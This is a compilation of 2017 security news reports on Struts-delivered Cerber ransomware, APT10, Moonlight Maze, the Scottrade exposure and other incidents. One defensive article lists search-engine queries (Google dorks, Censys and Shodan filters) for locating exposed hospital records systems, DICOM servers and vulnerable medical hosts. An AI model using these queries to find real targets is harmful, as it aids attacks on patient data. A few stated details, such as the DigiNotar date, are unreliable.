Cerber ransomware

“Since about a month, we are tracking numerous attempts to exploit the Java Struts2 vulnerability (CVE 2017-5638). Typically, the exploits targeted Unix systems with simple Perl backdoors and bots.” states an analysis published by experts at the SANS Technology Institute. “But recently, I saw a number of exploit attempts targeting Windows systems using a variant of the Cerber ransomware.”

Crooks exploited the CVE-2017-5638 vulnerability to run Windows tools like shell commands and ITSAdmin to download and execute the Cerber malware.

Below the attack sequence observed by the researchers at the SANS Institute:

The script uses BITSAdmin to download the malware (I obfuscated the URL above.
The malware (“UnInstall.exe”) is saved in the %TEMP% directory
finally, the malware is executed.
The experts at F5 Network analyzed the Bitcoin address where victims are told to send the payment of the ransom and discovered that 84 bitcoins, roughly $100,000 at the current market value.

“The new vulnerability in Apache STRUTS provides a target-rich environment for threat actors to extend their business while infecting thousands of new servers,” F5 said in a blog post. “Targeting servers, rather than individuals, with ransomware has better chances for monetization because those are usually run by organizations with deeper pockets and better infrastructure that might be critical for their business.”


Operation Cloud Hopper – APT10 goes after Managed Service Providers
7.4.2017 securityaffairs APT

Security experts uncovered a widespread campaign tracked as Operation Cloud Hopper known to be targeting managed service providers (MSPs) worldwide. Chinese APT10 group is the main suspect.
Security experts from PwC UK and BAE Systems have uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide. The experts attributed the operation to the Chinese APT group known as APT10.

Operation Cloud Hopper

The expert gathered evidence that suggests the involvement of the APT10 group and domain registration timing indicates operation were conducted with a China’s time zone.

Operation Cloud Hopper

The attackers used same malware exploited in other attacks attributed to APT10, the Poison Ivy RAT and PlugX malware are the most popular malicious codes in the arsenal of the crew. Experts noticed the group from around mid-2016 started to use once again PlugX, ChChes, Quasar and RedLeaves.

“APT10 has significantly increased its scale and capability since early 2016, including the addition of new custom tools. APT10 ceased its use of the Poison Ivy malware family after a 2013 FireEye report, which comprehensively detailed the malware’s functionality and features, and its use by several China-based threat actors, including APT10.” reads the report published by the security firms. “APT10 primarily used PlugX malware from 2014 to 2016, progressively improving and deploying newer versions, while simultaneously standardizing their command and control function.”

The Operation Cloud Hopper campaign leveraged on well-researched spear-phishing messages aimed to compromise MSPs.

The hackers used this tactic to obtain legitimate credentials to access the client networks of MPSs and exfiltrate sensitive data.

The attackers aimed to compromise the supply chain to steal intellectual property from the victims.

“Other threat actors have previously been observed using a similar method of a supply chain attack, for example, in the compromise of Dutch certificate authority DigiNotar in 2016 and the compromise of US retailer Target in 2013″ continues the report. “We believe that the observed targeting of MSPs is part of a widescale supply-chain attack.”

The Operation Cloud Hopper demonstrates that the APT10 focuses on cyber espionage activity, targeting intellectual property. The author of the report confirmed the APT10 has exfiltrated a high volume of data from multiple victims, exploiting compromised MSP networks.


Penquin’s Moonlit Maze
6.4.2017 Kaspersky CyberSpy

Download full report (PDF)

Download Appendix B (PDF)

Download YARA rules

Back to the Future – SAS 2016

As Thomas Rid left the SAS 2016 stage, he left us with a claim that turned the heads of the elite researchers who filled the detective-themed Tenerife conference hall. His investigation had turned up multiple sources involved in the original investigation into the historic Moonlight Maze cyberespionage campaign who claimed that the threat actor had evolved into the modern day Turla. What would this all mean?

The Titans of Old

Moonlight Maze is the stuff of cyberespionage legend. In 1996, in the infancy of the Internet, someone was rummaging through military, research, and university networks primarily in the United States, stealing sensitive information on a massive scale. Victims included the Pentagon, NASA, and the Department of Energy, to name a very limited few. The scale of the theft was literally monumental, as investigators claimed that a printout of the stolen materials would stand three times taller than the Washington Monument.

To say that this historic threat actor is directly related to the modern day Turla would elevate an already formidable modern day attacker to another league altogether. Turla is a prolific Russian-speaking group known for its covert exfiltration tactics such as the use of hijacked satellite connections, waterholing of government websites, covert channel backdoors, rootkits, and deception tactics. Its presumed origins track back to the famous Agent.BTZ, a campaign to spread through military networks through the use of USB keys that took formidable cooperation to purge (in the form of an interagency operation codenamed Buckshot Yankee in 2008). Though mitigating the threat got the most attention at the time, further research down the line saw this toolkit connecting directly to the modern Turla.

Further confirmation came through our own Kurt Baumgartner’s research for Virus Bulletin 2014 when he discovered Agent.BTZ samples that contacted a hijacked satellite IP jumping point, the same that was used by Turla later on. This advanced exfiltration technique is classic Turla and cemented the belief that the Agent.BTZ actor and Turla were one and the same. This would place Turla back as early as 2006-2007. But that’s still a decade ahead of the Moonlight Maze attack.

By 2016 the Internet was over-crowded with well-resourced cyberespionage crews. But twenty years ago there were few players in this game. Few paid attention to cyberespionage. In retrospect, we know that the Equation Group was probably active at this time. A command-and-control registration places Equation in the mid-1990s. That makes Equation the longest running cyberespionage group/toolkit in history. To then claim that Turla, in one form or another, was active for nearly as long, places them in a greater league than their pre-historic counterpart in pioneering state-sponsored cyberespionage.

A Working Hypothesis

By the time of the SAS 2016 presentation, we had already discussed at length how one might go about proving this link. The revelation that the Moonlight Maze attacks were dependent on a Solaris/*NIX toolkit and not a Windows one as is the case with most of Turla, actually revived our hopes. We would not have to look for older Windows samples where so far there were none, but could instead focus on another discovery. In 2014, Kaspersky announced the discovery of Penquin Turla, a Linux backdoor leveraged by Turla in specific attacks. We turned our attention once again to the rare Penquin samples and noticed something interesting: the code was compiled for the Linux Kernel versions 2.2.0 and 2.2.5, released in 1999. Moreover, the statically linked binaries libpcap and OpenSSL corresponded to versions released in the early 2000s. Finally, despite the original assessment incorrectly surmising that Penquin Turla was based on cd00r (an open-source backdoor by fx), it was actually based on LOKI2, another open-source backdoor for covert exfiltration written by Alhambra and daemon9 and released in Phrack in the late 1990s. This all added up to an extremely unusual set of circumstances for malware that was leveraged in attacks in from 2011-2016, with the latest Penquin Sample discovered just a month ago being submitted from a system in Germany.


Kurt Baumgartner’s prescient observation upon the discovery of the first Penquin Turla samples

Our working hypothesis became this: “The Turla developers decided to dust down old code and recompile it for current Windows victims in the hope of getting a stealthier beachhead on systems that are less likely to be monitored.” Were that to be the case, Penquin Turla could be the modern link that tied Turla to Moonlight Maze. But in order to prove our hypothesis and this historic evolution, we’d need a glimpse at the original artefacts, something we had no access to.

The Cupboard Samples

Our last hope was that someone somewhere had kept a set of backups collecting dust in a cupboard that they might be willing to share. Thomas took to the road to follow up his sources and eventually stumbled upon something remarkable. The Moonlight Maze operators were early adopters of a certain degree of operational security, using a series of hacked servers as relays to mask their original location. During the later stages of their campaign, they hacked a Solaris box in the U.K. to use as a relay. Unbeknown to them, the system administrator—in cooperation with the Metropolitan Police in London and the FBI—turned the server against the malicious operators. The machine known as ‘HRTest’ would proceed to log everything the attackers did keystroke-by-keystroke and save each and every binary and archive that transited through it. This was a huge win for the original investigators and provided something close to a six-month window of visibility before the attackers ditched this relay site (curiously, as a result of the campaign’s first publicity in early March 1999). Finding these samples was hard and fortuitous—due to a redaction error in an FBI FOIA release, we were able to ultimately track down David Hedges after about a year of sleuthing. “I hear you’re looking for HRTest,” David said when he finally called Thomas for the first time. Then, the now-retired administrator kicked a machine under his desk, chuckling as he said “well it’s sitting right here, and it’s still working.”

Thomas Rid, David Hedges, Daniel Moore, and Juan Andres Guerrero-Saade at King’s College London

Paydirt but not the Motherlode

What we had in our hands allowed us to recreate a portion of the constellation of attacks that constitutes Moonlight Maze. The samples and logs became our obsession for months. While Juan Andres and Costin at GReAT reversed the binaries (most compiled in SPARC for Solaris and MIPS for IRIX, ancient assembly languages), Daniel Moore went so far as to create an entire UI to parse and load the logs onto, so as to be able to visualize the extent of the networks and nodes under attack. We set out to profile our attackers and understand their methods. Among these, some salient features emerged:

Moore’s Rapyd Graph Data Analyzer tracking the victims of Moonlight Maze linked to HRTest

The attackers were prolific Unix users. They used their skills to script their attack phases, which allowed a sort of old school automation. Rather than have the malware communicate to command-and-control servers and carry out functions and exfiltration of their own accord, the attackers would manually log in to victim nodes and leverage scripts and tasking files (usually located in the /var/tmp/ directory) to instruct all of these nodes on what they should do, what information to collect, and finally on where to send it. This allowed them to orchestrate large swaths of infected machines despite being an ‘operator-at-keyboard’ style of attack.
The operators were learning as they went. Our analysis of the binaries shows a trial and error approach to malware development. Many binaries were simply open-source exploits leveraged as needed. Others were open-source backdoors and sniffers. However, despite not having exact compilation timestamps (as would happen in Windows executables), it’s possible to trace a binary evolution of sorts. The devs would test out new capabilities, then recompile binaries to fix issues and expand functionality as needed. This allowed us to graph a sort of binary tree of development to see how the attacks functionalities developed throughout this campaign.
Despite their early interest in OpSec, and use of tools specifically designed for this effect, the operators made a huge mistake. It was their standard behavior to use infected machines to look for further victims on the same network or to relay onto other networks altogether. In more than a dozen cases, the attackers had infected a machine with a sniffer that collected any activity on the victim machine and then proceeded to use these machines to connect to other victims. That meant that the attackers actually created near complete logs of everything they themselves did on these systems—and once they did their routine exfiltration, those self-logs were saved on the HRTest node for posterity. The attackers created their own digital footprint for perpetuity.
So what’s the verdict?

A complete analysis of the attack artefacts is provided in the whitepaper, for those interested in a look under the hood of a portion of the Moonlight Maze attacks. For those who would like to jump straight to the conclusion: our parallel investigation into the connection between Moonlight Maze and Turla yielded a more nuanced answer predicated upon the limitations in our visibility.

An objective view of the investigation would have to admit that a conclusion is simply premature. The unprecedented public visibility into the Moonlight Maze attack provided by David Hedges is fascinating, but far from complete. It spans a window between 1998-1999 as well as samples apparently compiled as far back as late 1996. On the other hand, the Penquin Turla codebase appears to have been primarily developed from 1999-2004 before being leveraged in more modern attacks. What we are left with is a circumstantial argument that takes into account the binary evolution witnessed from 1998-1999 as well as the functionality and tools leveraged at that time, both of which point us to a development trend that could lead directly to what is now known as Penquin Turla. This includes the use of tasking files, LOKI2 for covert channel communications, and promiscuous sniffers – all of which made it into the modern Penquin Turla variants.

The next step in our ongoing parallel investigation would have to focus on a little known operation codenamed ‘Storm Cloud’. This codename represents the evolved toolkit leveraged by the same Moonlight Maze operators once the initial intrusions became public in 1999. In 2003, the story of Storm Cloud leaked with little fanfare, but a few prescient details led us to believe a more definitive answer may be found in this intrusion set:

Storm Cloud reference in a 2003 Wall Street Journal Article mentions further use of LOKI2

Just as the SAS 2016 talk enabled us to find David and his time capsule of Moonlight Maze artefacts, we hope this glimpse into our ongoing research will bring another dedicated sysadmin out of the woodwork who may still have access to Storm Cloud artefacts, allowing us to settle this question once and for all. Beyond the historical value of this understanding, it would afford greater perspective into a tool being leveraged in cyberespionage attacks to this day.


The Mistakes of Smart Medicine
6.4.2017 Kaspersky Safety
As numerous studies have shown, smart houses, smart cars, and smart cities are undeniably beneficial to people in everyday life, but quite often can become a threat to their safety. It is not only a matter of personal data leakage. Just imagine that, for example, a smart refrigerator, affected by a third party at one point or another, would begin identifying expired products as fresh. There is yet another more dismal scenario: the system of a smart car turns the vehicle to the right at high speed, catching the driver unaware…

However, both existing and predictable threats that emerge from home IoT devices are only part of the problem related to the infrastructure around us becoming “smarter”. A technological boom in medicine both encouraged medical institutions to use exclusively information systems in processing data and led to the emergence of new types of technological equipment and personal devices that can be used to interact with traditional systems and networks. This means that the threats that are relevant for them can also be relevant for medical systems.

Entry Points for Accessing Valuable Data

For the medical industry, the main attack vector is related to personal data and information on the health condition of patients. The first step in evaluating the security level for data is identifying entry points within the infrastructure of medical institutions where healthcare data can be collected, stored, and/or taken advantage of by an evildoer.

Possible entry points can be classified as follows:

information systems on the computer network of a medical institution (servers, workstations, admin panels for medical equipment, etc.) that access the Internet;
medical equipment that is connected to an enterprise network;
medical equipment that is not a network node but connects to a workstation (for example, via USB);
portable devices of patients (advanced fitness trackers, pacemakers and cardiac monitors, insulin pumps, etc.) and mobile devices that can track health indicators (mobile smartphones and smart watches);
other wireless information systems (Wi-Fi, Bluetooth, or RF), which can be mobile ECG devices, pulse oximeters, event monitors for tracking the medical condition of high-risk patients, and so on.
For the last three classes mentioned above, a detailed first-hand analysis of specific models related to these classes is required. It is for exactly this reason that those devices deserve an article of their own. For now, we will focus on devices and their components that do not require physical access and are frequently accessible from the Internet.

Portable Devices May Port Medical Histories

We’ve already written the following about the security of portable devices in March of 2015: “Just imagine, if a fitness tracker with a heart-rate monitor is hacked, then any shop owner will be able to track the heart rate of buyers as they look at discounts in the shop. The influence of advertisements on people can be learned in the same manner. Moreover, a hacked fitness tracker with a heart-rate monitor can be used as a lie detector.”

Owing to the increasing accuracy of sensors, gadgets that collect data on the health condition of their owners can potentially be used in serious ambulatory care to assess a patient’s health. However, the level of security for these gadgets has not been developing as fast as their capabilities.

Tracking vital signs with the help of mobile devices may become an integral part of ambulatory care in the nearest future

Information that is collected by tracking vital signs can be used by both the owner of the device and the vendor of the infrastructure that the tracking app operates on. For users, the heart-rate parameter can signify that a certain activity should be decreased, specific medicines should be taken, etc., while vendors can send collected data to medical companies that can use it to assess the overall health of the client.

Thus, the main advantage of data collected by a gadget is not the depth of its analysis (any medical examination will yield more accurate results than readings from a fitness tracker) but the ability to evaluate changes in a patient’s health condition dynamically. Scenarios for using the information are limited by the imagination and enterprise of the owner, as well as by laws related to personal data.

If we look at the same piece of information from the perspective of a cybercriminal, then an owner of such a device will have not the most favorable outlook – analysis of certain parameters (for example, heart rate, sleep quality, or average ADL score) allows a criminal to gain an overview of a victim’s health. Any additional information may be provided by a gadget that is connected to the mobile device and is capable, for instance, of measuring the blood pressure or blood sugar levels of its user. After making conclusions about the ailments of a victim, an evildoer can provoke their aggravation.

Attacks to obtain health data can be divided into three basic types: those that violate data privacy, those that compromise data integrity, and those that attack data availability. Main vectors can be defined for each of those.

Types of attack that violate the privacy of medical data:

man-in-the-middle attacks on a sensor channel between the sensor and the service that stores the sensor’s data;
unauthorized access to local and remote data storage.
Types of attacks on data integrity:

unauthorized access to data storage with possible data substitution;
man-in-the-middle spoofing attacks on channels in order to substitute transmitted data;
modification (substitution) of data (spoofing attacks) and their transmission to consumers (as a service that stores data or an app).
Attacks on availability:

ransomware attacks (encryption/deletion of user data).
Entry points for malicious code that commits theft or substitutes data on a mobile device depend on a specific combination of device and software.

Online Medical Data

Yet, I would like to review another entry point in detail – information systems on a medical institution’s network that are accessible from the Internet.

Medical institutions utilize automated healthcare data storage solutions, which store miscellaneous information about patients (diagnosis results, information about prescribed drugs, medical histories, etc.). The infrastructure of such a system may include various hardware and software components, which can be merged into data storage networks and can be accessible from the Internet in one form or another.

Regarding solutions for storage of healthcare data, several software packages, which can be exploited as entry points into medical infrastructure, can be given as examples.

Hospital information systems (HISs) are software packages that control medical information coming from various sources, including the systems mentioned below.
Electronic Health Records (EHR) systems are dedicated software that enable storage of structured patient data and documentation of patient medical history.
Network-attached storage (NAS) refers to dedicated network storage devices, which can be both specialized devices for storing healthcare data or enterprise devices employed in the medical-institution
DICOM-complaint (Digital Imaging and Communications in Medicine) devices and PACS (picture archiving and communication system) servers are medical information systems based on the DICOM standard and include the following components:
a DICOM client, which is a medical device that is capable of transmitting data to a DICOM server;
a DICOM server, which is a hardware and software package that provides for the receipt and storage of data from clients (in particular, these devices can be PACS servers);
a DICOM diagnostic workstation and DICOM printers, both of which are hardware and software packages that are responsible for processing, visualizing, and printing medical images.
A key feature of the above-mentioned systems is a web interface (a web app) that is used to control them over the Internet. A web interface may have vulnerabilities that can be exploited by an evildoer, who can gain access to valuable information and processes. It is worth reviewing these systems in detail and verifying whether they are accessible from the Internet, i.e. if they are a potential entry point for evildoers.

Electronic Health Records (EHR)

In order to evaluate the number of apps that are available from the outside (from the Internet) and can work with EHR, a list of software employed in these tasks should be created and then a dork list should be organized. Dorks are special search-engine queries that are aimed at finding web components of required software among all of the resources indexed by a search engine.

Here is an example of a dork query that uses Google to search for the login form of EHR software components:

intitle:”<vendor_name> Login” & inurl:<vendor name>

The example of a discovered web component (a login form) of software that is intended to work with EHR

It should be noted that some of the resources found in the search results turned out to be traps for evildoers (honeypots). This fact alone indicates that analysts are seeking to track threats related to medical infrastructure. To check if an identified resource is a honeypot, an IP address should be submitted to a special service, HoneyScore, which, by scanning a number of the resource’s attributes (for example, the hosting provider), reaches a verdict on whether or not the resource is a honeypot. Nevertheless, a significant part of the discovered resources is represented by actual systems.

126 discovered resources that meet the search criteria

Each of the discovered web resources is a potential entry point that can be exploited by an evildoer to access the infrastructure. For example, many discovered systems lack protection against an exhaustive password search, which means that a criminal can use brute-force attacks. Then, by using a hacked account, the evildoer can gain privileged access to the system through the interface or find or exploit online vulnerabilities in order to access the system in the future.

An example of a discovered web interface for logging into an EHR system

Hospital Information Systems (HISs)

A “hospital information system” is quite a vast notion that includes a set of methods and technologies for processing medical information. In our case, we are interested only in the HIS components that have a web interface for controlling and visualizing medical information.

Let’s consider the software of OpenEMR as an example. This software is used in medical institutions as a medical-data management solution, and it is certified by the Office of the National Coordinator for Health Information Technology (ONC). Some of its components are written in the PHP programming language, which means that a potential entry point for an evildoer can be a web server that maintains these OpenEMR components.

The next Google dork query returned 106 search results that meet the following criterion:

inurl:”/interface/login/login_frame.php” intitle:”Login” intext:”Username:”

After a quick analysis of the search results, it became obvious that components of the majority of the discovered OpenEMR systems have vulnerabilities, including some critical ones. This means that these vulnerabilities open up the OpenEMR database to being compromised. This comes with the fact that exploits for the discovered vulnerabilities are publicly available.

An example of a vulnerable HIS that was openly exposed

For example, analyzing different software versions revealed that information had been published on the vulnerabilities for the vast majority of software installed on the hosts.

OpenEMR version Number of hosts (%) Availability of public exploits
4.2.0 31,4 Yes
4.1.2 14,3 Yes
4.1.0 11,4 Yes
4.2.1 5,7 No
4.0.0 5,7 Yes
4.1.1 2,8 Yes
4.3.1-dev 2,8 No
2.8.3 2,8 Yes
3.2.0 2,8 Yes
Proprietary (modified) version 8,5 –
Unknown version 11,4 –
Network Attached Storage (NAS)

There are at least two types of NAS servers that have been used by medical institutions: dedicated “medical” NAS servers and common ones. While the former have strict security requirements for the data stored on them (for example, compliance with the Health Insurance Portability and Accountability Act), the security of the latter rests on the conscience of their developers and the medical institutions that use this type of NAS in their infrastructure. As a result, non-medical NAS may be left working without any updates for years and thus gather a great number of known vulnerabilities.

A list of dorks should be created to select NAS devices located in medical institutions out of all of the other devices indexed by search engines.

The next query is for the Censys search engine, which specializes in indexing devices with IP addresses and finds all of the devices (workstations, servers, routers, NAS servers, etc.) that belong to companies whose names contain words that directly or indirectly define these companies as medical institutions (“healthcare”, “clinic”, “hospital”, and “medical”):

autonomous_system.organization: (hospital or clinic or medical or healthcare)

The Censys search engine found approximately 21,278 hosts that are related to medical institutions

The Censys report, which is shown below, lists the top 10 countries where these hosts are located.

Country Hosts
United States 18 926
Canada 1113
Iran 441
Saudi Arabia 379
Republic of Korea 135
Australia 81
Thailand 33
United Kingdom 32
Puerto Rico 28
Vietnam 27
Afterward, only those hosts that are FTP servers can be taken out from the search results that contain the hosts. In order to do this, the query in the search engine should be more specific and, for example, only the hosts that contain an open FTP port and whose banners contain the “FTP” line should be searched for (this is the information that a server sends to a client during attempts to connect to its port):

(tags: ftp) and autonomous_system.organization: (health or clinic or medical or healthcare)

The search results displayed 1,094 hosts with operational FTP servers, which presumably belong to medical institutions.

Additionally, a list of vendor-specific NAS devices can be obtained from the narrowed-down search results. For this, the typical characteristics of a device must be known. These may be included in responses from services that are active on the device (for example, an FTP-server response to a connection attempt may contain the name of the device and its firmware version). The next query allows for selection of only those hosts that contain the “NAS” line in their banner (generally, several QNAP Systems models have this property) from all found hosts:

(metadata.description: nas) and autonomous_system.organization: (health or clinic or medical or healthcare)

The discovered QNAP Systems NAS servers that belong to medical organizations

A ProFTPd web-server release that has vulnerabilities was installed on each of the found NAS. For this release, there is also publicly available and easily accessible information about its exploits.

PACS Servers and DICOM Devices

The most common type of devices that utilize the DICOM format are PACS servers that print patient images that have been received from other DICOM devices.

It is possible to enter the following primitive query in the Shodan search engine to start searching for DICOM devices:

DICOM port:104

Accordingly, the search results will display hosts (mostly workstations and servers) that are used in medical institutions for storing and processing patient DICOM images.

The list of hosts that are used to process/store DICOM images

Also, it might be worth searching for diagnostic DICOM workstations, which are dedicated PACS systems used for processing, diagnosing, and visualizing data. As an example, the following query for the Censys search engine can be used:

pacs and autonomous_system.organization: (hospital or clinic or medical or healthcare)

Analysis of the search results may reveal dedicated software for a diagnostic workstation.

The login forms of diagnostic workstations used for visualization of patient data

Aside from that, there are also admin panels used to access DICOM servers in the search results.

A login form for accessing a DICOM server

Non-medical Systems with “Pathologies”

The systems described above handle valuable medical data. Therefore, security requirements for those systems must be high. However, let’s not forget that besides potential entry points, there are dozens of other points an evildoer can use that are not directly related to medical systems but are located in the infrastructure along with valuable data.

Here are several examples of non-medical systems that can be used as a potential entry point into a computer network with the goal of subsequently moving on to resources where medical information is stored:

any servers (web servers, FTP servers, e-mail servers, etc.) that are connected to the network of an institution and are accessible from the Internet;
a medical institution’s public Wi-Fi hotspots;
office printers;
video surveillance systems;
SCADA controllers;
automated systems for controlling mechanical and electrical components of a building (building management systems, BMS).
Each of the mentioned systems may have a vulnerability that can be taken advantage of by an evildoer in order to gain access to medical infrastructure.

For example, the popularity of the Heartbleed vulnerability can be evaluated. This requires entering the following query into the Censys search engine:

autonomous_system.organization: (hospital or clinic or medical or healthcare) and 443.https.heartbleed.heartbleed_vulnerable: 1

The search engine showed 66 hosts that met the criteria and were potentially vulnerable to Heartbleed. Additionally, this was after the existence of the vulnerability, and its dangers had been given wide coverage by the mass media. Generally speaking, when referring to Heartbleed, it should be noted that the problem is global in nature. According to a report by the founder of Shodan, approximately 200,000 websites still remain vulnerable.

Stay Healthy

In order keep evildoers from stealing medical data from institutions, we, along with taking essential security measures typical for enterprise infrastructure, recommend doing the following:

exclude from external access all of the information systems that process medical data or any other patient-related data;
all of the medical equipment that connects to a workstation (or is a network node) should be isolated in a dedicated segment, while the operational parameters of the equipment can be modified by using the workstation (or remotely);
any online information systems should be isolated in a “demilitarized” zone or completely excluded from an enterprise network;
continuously monitor medical-system software for updates and update software regularly;
change default passwords that are set up for the login forms of medical systems and delete unwanted accounts from the database (for example, test accounts);
create strong passwords for all accounts.


Scottrade Bank admits a data breach that potentially exposed 20,000 customers’ records
6.4.2017 securityaffairs CyberCrime

Scottrade Bank confirmed that a technical incident has exposed 20,000 customer records. a 60GB MSSQL database was accidentally left open online.
It is official, the Scottrade Bank suffered a data breach that affected thousands of its customers.

Online brokerage Scottrade has admitted the data breach for sensitive loan applications from roughly 20,000 customers.

Scottrade

The incident occurred when IT services company Genpact uploaded the sensitive data to an Amazon-hosted server. Unfortunately, the company didn’t protect the precious archive leaving it exposed online without protection.

The incident was discovered by the popular security expert Chris Vickery, who was well known to have discovered many other databases left online without protection. Vickery discovered the precious archive and downloaded the 158.9GB Microsoft SQL database, then he decided to report the issue to Scottrade.

According to Vickery the archive contains account passwords in plain text, the exposed records include names, addresses and social security numbers.

Follow
Chris Vickery @VickerySec
Large MSSQL db fully loaded. It's as bad as I expected. Bank-related. Plaintext passwords. Big name company. I've reached out to them.
12:38 AM - 2 Apr 2017
28 28 Retweets 26 26 likes
Scottrade promptly started an investigation and discovered the root cause of the incident. A Genpact employee hasn’t properly configured the SQL server.

“On April 2, Genpact, a third party vendor, confirmed that it had uploaded a data set to one of its cloud servers that did not have all security protocols in place. As a result, the data was not fully secured for a period of time. The file contained commercial loan application information of a small B2B unit within Scottrade Bank, including non-public information of as many as 20,000 individuals and businesses.” reads the official statement issued by Scottrade. “Upon being alerted to the issue, Genpact immediately secured that information, and traced the issue to a configuration error on their part while uploading the file.”

The precious archive has now been immediately removed from online after the breach notification.

The service provider Genpact is investigating the incident to determine which data have been exposed.

“Genpact is undertaking an extensive analysis of the log files and the environment to determine to what extent the data may have been accessed. It has engaged a leading forensics firm to assist in the analysis.” continues the statement.

Genpact and Scottrade confirmed that the incident wasn’t caused by a cyber attack against the internal servers of both companies.

Scottrade has already suffered a data breach in the past, in October 2015 an incident exposed the personal information of 4.6 million customers.


Apache Struts Flaw Used to Deliver Cerber Ransomware

6.4.2017 securityweek Virus
A recently patched Apache Struts 2 vulnerability has been exploited by cybercriminals to deliver Cerber ransomware to Windows systems, researchers warned.

The flaw, tracked as CVE-2017-5638, can be exploited for remote code execution. Malicious actors started exploiting the vulnerability to deliver malware shortly after a patch was made available and a proof-of-concept (PoC) exploit was released.

In many cases, attackers targeted Unix systems with backdoors and distributed denial-of-service (DDoS) bots, but recently experts also spotted a campaign targeting Windows machines.

In the week of March 20, researchers at F5 Networks started seeing attacks delivering Cerber ransomware to Windows servers. Experts at the SANS Technology Institute also reported seeing these attacks on Wednesday.

Cybercriminals have used the exploit to execute shell commands and run BITSAdmin and other command-line tools shipped with Windows. These tools are used to download and execute the Cerber malware.

The ransomware encrypts important files found on the system and demands money in return for the “special decryption software” needed to recover the files.

The Bitcoin address where victims are instructed to send the ransom is the same across multiple campaigns. F5 Networks reported seeing 84 bitcoins, currently worth nearly $100,000, in that address.

“The new vulnerability in Apache STRUTS provides a target-rich environment for threat actors to extend their business while infecting thousands of new servers,” F5 said in a blog post. “Targeting servers, rather than individuals, with ransomware has better chances for monetization because those are usually run by organizations with deeper pockets and better infrastructure that might be critical for their business.”

AT&T vulnerable to Apache Struts exploit

The Apache Struts vulnerability has been found to affect many products, including from Cisco and VMware.

Independent security researcher Corben Douglas reported on Wednesday that he tested AT&T systems roughly 4-5 days after the exploit was released and they had been vulnerable to attacks. The expert said he managed to execute commands on AT&T servers, which could have allowed him to “pwn” the company.


Mozilla Wants 64 Bits of Entropy in Certificate Serial Numbers

6.4.2017 securityweek Security
Mozilla this week announced an update to its CA Certificate Policy, which now requires the use of 64 bits of entropy in certificate serial numbers.

The change was included in Mozilla’s CA Certificate Policy 2.4.1, and arrives nearly one year after the CA/Browser Forum adopted Ballot 164, which required Certificate Authorities to use greater randomization when issuing certificates, to mitigate collision attacks and make preimage attacks more difficult.

The ballot also proposed replacing entropy with cryptographically secure pseudo-random number generator (CSPRNG). Thus, Section 7.1 of the Baseline Requirements was modified to “Effective September 30, 2016, CAs SHALL generate Certificate serial numbers greater than zero (0) containing at least 64 bits of output from a CSPRNG.”

The change was proposed after it was demonstrated that hash collisions can allow attackers to forge a signature on the certificate of their choosing and that random bits made the security level of a hash function twice as powerful. While adding random bits was encouraged before, the ballot made it a requirement.

The updated CA Certificate Policy also states that CP and CPS documents now need to be submitted to Mozilla each year, in addition to audit statements, and that these documents need to be provided in English starting June 1, 2017. The company also updated the applicable versions of some audit criteria.

Mozilla also notes that submitted documentation must be openly licensed and that the Common CCADB Policy and the Mozilla CCADB Policy are incorporated by reference in Mozilla’s CA Certificate Policy version. Further, the new Common CA Database (CCADB) Policy makes official a number of existing expectations regarding the CCADB, and there are additional requirements on OCSP responses, the company says.

The organization has already sent the CA Communication to the Primary Point of Contact (POC) for each CA and asked them to respond to 14 action items. Additionally, there are discussions in the mozilla.dev.security.policy forum about upcoming changes, questions and clarification about policy and expectations, root certificate inclusion/change requests, that CAs are invited to contribute to.

“With this CA Communication, we re-iterate that participation in Mozilla’s CA Certificate Program is at our sole discretion, and we will take whatever steps are necessary to keep our users safe. Nevertheless, we believe that the best approach to safeguard that security is to work with CAs as partners, to foster open and frank communication, and to be diligent in looking for ways to improve,” the company said.


"Philadelphia" Ransomware Targets Healthcare Industry

6.4.2017 securityweek Virus
A newly observed ransomware family is being used in attacks against organizations in the healthcare industry, Forcepoint security researchers reveal.

Dubbed Philadelphia, the malware is a variant of the Stampado malware that emerged last year as one of the cheapest ransomware families available for would-be cybercriminals. It was being offered at only $39 for a lifetime license, much less than what other threats sold via the ransomware-as-a-service (RaaS) business model cost. An ad for Philadelphia was spotted last month on YouTube.

The Philadelphia ransomware, Forcepoint says, appears to be distributed via spear-phishing emails that contain a shortened URL, and has been already used to infect a hospital from Oregon and Southwest Washington. The link redirects to a personal storage site that serves a malicious DOCX file containing the targeted healthcare organization's logo to give it an increased sense of legitimacy.

The file includes three document icons allegedly pertaining to patient information, and the intended victim is encouraged to click on any of them. However, once that happens, a malicious JavaScript is triggered to download and execute the Philadelphia ransomware.

After installation, the malware communicates to its command and control (C&C) server to check in. It sends various details on the infected system, including operating system, username, country, and system language, and the C&C responds with a generated victim ID, a Bitcoin wallet ID, and the Bitcoin ransom price.

Next, the malware starts encrypting user files using AES-256 encryption. Once the process has been completed, the ransomware displays a window informing users that their files have been encrypted and urging them to pay 0.3 Bitcoins to a specific address.

According to Forcepoint, not only did the cybercriminals use a tailored bait targeting a specific healthcare organization in their attack, but the encrypted JavaScript they used contained the string “hospitalspam” in its directory path. Moreover, the C&C server also contained “hospital/spam” in its path.

This would suggest that the actor is specifically targeting hospitals using spear phishing emails for distribution, the researchers say. The campaign supposedly started in the third week of March.

“Individually, this may not be a great deal of an attack towards the Healthcare sector. However, this may signify the start of a trend wherein smaller ransomware operators empowered by RaaS platforms will start aiming for this industry, ultimately leading to even bigger and diversified ransomware attacks against the Healthcare sector,” Forcepoint concludes.


PLCs From Several Vendors Vulnerable to Replay Attacks

6.4.2017 securityweek ICS
Programmable logic controllers (PLCs) from several major vendors are affected by implementation flaws that can be exploited by attackers to execute arbitrary commands on the vulnerable devices, researchers warned.

The vulnerabilities, identified by ICS security firm CRITIFENCE, are related to the Modbus communications protocol, which is often used for connecting industrial devices. The company has been criticized for leading people to believe that ransomware attacks leveraging the flaws had already been spotted in the wild.

According to CRITIFENCE, devices from several companies are vulnerable to attacks, including Schneider Electric, GE and Rockwell Automation’s Allen-Bradley.

For the time being, only Schneider addressed the problem and the advisory published by the security firm focuses on Schneider products. ICS-CERT and other affected vendors have been notified.

In the case of Schneider, the vulnerabilities affect Modicon PLCs. The company has not released any firmware updates, but pointed out that some of its products already include protection mechanisms for these types of attacks, and provided mitigation advice for devices that don’t have any built-in protections.

CRITIFENCE said in its advisory that attacks are possible against Schneider PLCs due to two vulnerabilities: CVE-2017-6034 and CVE-2017-6032. An attacker who has access to the OT network can intercept traffic going to the targeted PLC, including the session identifier needed to send administrative commands to the device.

